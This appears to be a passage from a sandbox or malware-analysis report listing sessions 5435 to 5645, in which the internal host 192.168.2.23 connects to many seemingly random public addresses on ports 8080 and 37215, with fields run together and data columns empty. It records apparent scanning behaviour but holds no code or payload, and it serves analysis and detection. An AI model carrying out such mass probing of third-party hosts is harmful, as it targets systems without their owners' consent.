                                                        5435192.168.2.2351842120.198.199.1938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5436192.168.2.2343172201.88.124.1918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5437192.168.2.235572690.29.216.1498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5438192.168.2.233707276.81.4.1778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5439192.168.2.2359222187.207.126.2348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5440192.168.2.234319267.134.207.858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5441192.168.2.2334050115.54.214.628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5442192.168.2.234536662.210.136.2238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5443192.168.2.2337088149.216.111.138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5444192.168.2.2338698175.109.69.2498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5445192.168.2.2342100183.57.48.2248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5446192.168.2.2348070142.27.220.98080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5447192.168.2.233951019.245.167.678080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5448192.168.2.234619879.204.208.2008080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5449192.168.2.2358060119.216.44.1248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5450192.168.2.2349072162.173.43.888080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5451192.168.2.233648027.237.149.1628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5452192.168.2.2348194110.244.157.508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5453192.168.2.2360430148.12.65.38080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5454192.168.2.2356448174.199.227.1028080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5455192.168.2.2354830149.36.178.918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5456192.168.2.2346340218.255.251.1118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5457192.168.2.2359498133.255.254.488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5458192.168.2.233992812.249.217.2148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5459192.168.2.2339334111.247.239.1668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5460192.168.2.2337494165.175.76.1868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5461192.168.2.2350950218.207.124.2358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5462192.168.2.234252466.2.147.968080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5463192.168.2.2341576169.205.106.558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5464192.168.2.2338164206.52.246.268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5465192.168.2.235323880.158.192.1708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5466192.168.2.235756281.58.187.268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5467192.168.2.235624631.79.23.2198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5468192.168.2.2336302159.164.233.2158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5469192.168.2.2355412212.152.184.2078080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5470192.168.2.2340130202.144.252.808080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5471192.168.2.2357326201.233.194.1688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5472192.168.2.2343244105.212.20.2048080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5473192.168.2.2350728120.100.72.608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5474192.168.2.2345292162.74.99.138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5475192.168.2.2338078129.190.200.788080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5476192.168.2.2341354134.56.148.1908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5477192.168.2.2339942217.198.232.2498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5478192.168.2.2336290105.32.27.2298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5479192.168.2.2343282128.163.106.1438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5480192.168.2.2360810115.142.102.1228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5481192.168.2.2338234125.87.113.2458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5482192.168.2.234355081.102.113.1648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5483192.168.2.235948484.212.196.798080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5484192.168.2.234799017.150.248.208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5485192.168.2.2339938164.222.192.1998080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5486192.168.2.2351118101.3.87.788080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5487192.168.2.2342896145.98.0.2218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5488192.168.2.2347994153.131.55.2498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5489192.168.2.2350996155.55.149.868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5490192.168.2.235840659.42.36.348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5491192.168.2.2346990168.101.88.2258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5492192.168.2.2352450106.206.56.708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5493192.168.2.2346224191.220.111.2528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5494192.168.2.233972494.110.210.1728080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5495192.168.2.2334172153.83.137.498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5496192.168.2.235793863.154.196.198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5497192.168.2.2350102190.198.154.908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5498192.168.2.235172090.56.70.1058080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5499192.168.2.2357388130.80.59.1058080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5500192.168.2.233321897.179.11.1918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5501192.168.2.2351156170.100.90.458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5502192.168.2.2336152120.90.215.1418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5503192.168.2.233836468.242.177.498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5504192.168.2.235620896.254.183.1638080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5505192.168.2.234026414.79.59.638080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5506192.168.2.2359500164.24.11.2518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5507192.168.2.2356548119.87.185.788080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5508192.168.2.233910284.135.227.828080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5509192.168.2.2340622105.179.54.808080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5510192.168.2.234115274.231.194.388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5511192.168.2.2346546139.251.196.488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5512192.168.2.234650878.238.80.08080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5513192.168.2.2341476208.122.252.618080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5514192.168.2.234070085.67.17.488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5515192.168.2.234235662.18.47.238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5516192.168.2.235817020.55.208.2318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5517192.168.2.235054279.87.39.2538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5518192.168.2.234786264.155.28.28080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5519192.168.2.2359186206.175.229.18080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5520192.168.2.2359514169.240.198.398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5521192.168.2.234945293.119.86.1708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5522192.168.2.2354420101.18.175.728080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5523192.168.2.2358960165.36.99.1698080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5524192.168.2.2354334172.87.183.988080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5525192.168.2.2353758172.46.203.48080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5526192.168.2.234207618.136.20.2368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5527192.168.2.2358754209.185.5.198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5528192.168.2.2333228207.247.117.518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5529192.168.2.233330693.97.51.708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5530192.168.2.2345268151.29.200.1038080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5531192.168.2.2343126172.150.181.08080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5532192.168.2.234079294.141.224.98080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5533192.168.2.2333164145.9.168.798080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5534192.168.2.2333440128.82.122.2288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5535192.168.2.2348600146.213.141.678080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5536192.168.2.2354472119.215.206.328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5537192.168.2.2333146113.101.220.1428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5538192.168.2.23419268.181.239.1688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5539192.168.2.236090452.167.39.2138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5540192.168.2.233933020.17.216.688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5541192.168.2.23571604.49.148.298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5542192.168.2.234966877.101.98.1408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5543192.168.2.2350638158.12.17.2538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5544192.168.2.2339936137.215.196.858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5545192.168.2.233531836.38.36.1298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5546192.168.2.234347095.244.187.1538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5547192.168.2.2359208111.70.12.1028080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5548192.168.2.2344934165.157.119.1848080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5549192.168.2.235191885.44.215.38080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5550192.168.2.2351868222.164.145.48080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5551192.168.2.235710483.187.237.1628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5552192.168.2.2360796147.255.91.658080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5553192.168.2.234873863.157.75.1208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5554192.168.2.2336274194.210.179.548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5555192.168.2.2339846158.106.202.418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5556192.168.2.2343262128.82.210.1038080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5557192.168.2.2348698144.53.196.168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5558192.168.2.2359268155.216.3.448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5559192.168.2.2358732121.89.193.2308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5560192.168.2.2338804195.157.209.418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5561192.168.2.233634058.52.51.2348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5562192.168.2.234772418.18.4.618080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5563192.168.2.2340222112.243.168.1558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5564192.168.2.234678819.232.40.698080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5565192.168.2.2358422208.39.197.1258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5566192.168.2.2340050189.242.169.2198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5567192.168.2.2355970102.196.228.2148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5568192.168.2.235083424.57.51.1838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5569192.168.2.2336932148.74.204.28080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5570192.168.2.234762035.149.15.1768080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5571192.168.2.2349716210.62.76.1468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5572192.168.2.233800063.134.241.158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5573192.168.2.2344250213.209.129.1298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5574192.168.2.235968618.97.207.2318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5575192.168.2.2350760109.223.182.528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5576192.168.2.233573298.210.7.458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5577192.168.2.2359056174.47.100.328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5578192.168.2.235463888.193.143.1548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5579192.168.2.2338140143.18.50.368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5580192.168.2.235199657.242.70.1978080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5581192.168.2.23566109.189.4.1378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5582192.168.2.233770223.186.190.1808080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5583192.168.2.2356718170.208.85.2318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5584192.168.2.2350300177.102.98.1688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5585192.168.2.2350496190.132.219.288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5586192.168.2.2342096188.18.244.1068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5587192.168.2.234636667.78.48.2208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5588192.168.2.23603542.20.78.88080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5589192.168.2.2353200106.209.137.2168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5590192.168.2.2360126106.217.204.1158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5591192.168.2.2353524163.249.97.1828080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5592192.168.2.2352158125.149.121.1678080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5593192.168.2.23607862.206.87.2498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5594192.168.2.2345128218.164.133.1098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5595192.168.2.234229090.96.229.1738080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5596192.168.2.234165214.156.139.1348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5597192.168.2.234401039.12.172.888080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5598192.168.2.2341648192.32.146.2238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5599192.168.2.2335450174.84.176.1188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5600192.168.2.233371468.16.75.368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5601192.168.2.233722499.45.143.148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5602192.168.2.2339420140.32.94.1898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5603192.168.2.2352916112.0.231.38080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5604192.168.2.233724892.47.177.1098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5605192.168.2.234468477.45.86.408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5606192.168.2.2360012104.4.193.2518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5607192.168.2.2340738115.118.74.778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5608192.168.2.235836460.121.220.1328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5609192.168.2.2348852221.16.90.1168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5610192.168.2.2352546165.131.188.818080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5611192.168.2.2360268194.22.42.1988080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5612192.168.2.2344504104.17.19.118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5613192.168.2.2355568100.43.126.1728080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5614192.168.2.234092252.110.51.1058080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5615192.168.2.2348158187.192.58.538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5616192.168.2.2351340140.119.131.1648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5617192.168.2.234489285.149.64.1828080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5618192.168.2.2354556223.3.112.1428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5619192.168.2.2339422153.60.155.258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5620192.168.2.2342112180.224.109.1158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5621192.168.2.236032876.154.73.228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5622192.168.2.2347192168.72.198.38080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5623192.168.2.2334276201.139.22.1478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5624192.168.2.233605272.28.19.418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5625192.168.2.2346822104.90.3.78080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5626192.168.2.2347430200.107.76.1698080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5627192.168.2.2342864158.228.255.2108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5628192.168.2.233630661.136.15.298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5629192.168.2.2337192118.135.81.1628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5630192.168.2.235298051.189.86.1108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5631192.168.2.2350572183.54.199.988080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5632192.168.2.234697013.168.164.2328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5633192.168.2.23408429.187.247.1568080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5634192.168.2.2349966197.255.248.22037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5635192.168.2.2336944119.38.31.20537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5636192.168.2.2343396165.218.197.19737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5637192.168.2.2343646197.140.168.17537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5638192.168.2.235857041.139.225.23237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5639192.168.2.234214460.148.82.16137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5640192.168.2.2340832197.199.14.19237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5641192.168.2.2360782124.250.40.2937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5642192.168.2.235501441.204.177.17937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5643192.168.2.2340290157.130.23.22637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5644192.168.2.2341622157.138.56.6337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5645192.168.2.234223441.53.134.14437215
                                                        TimestampBytes transferredDirectionData


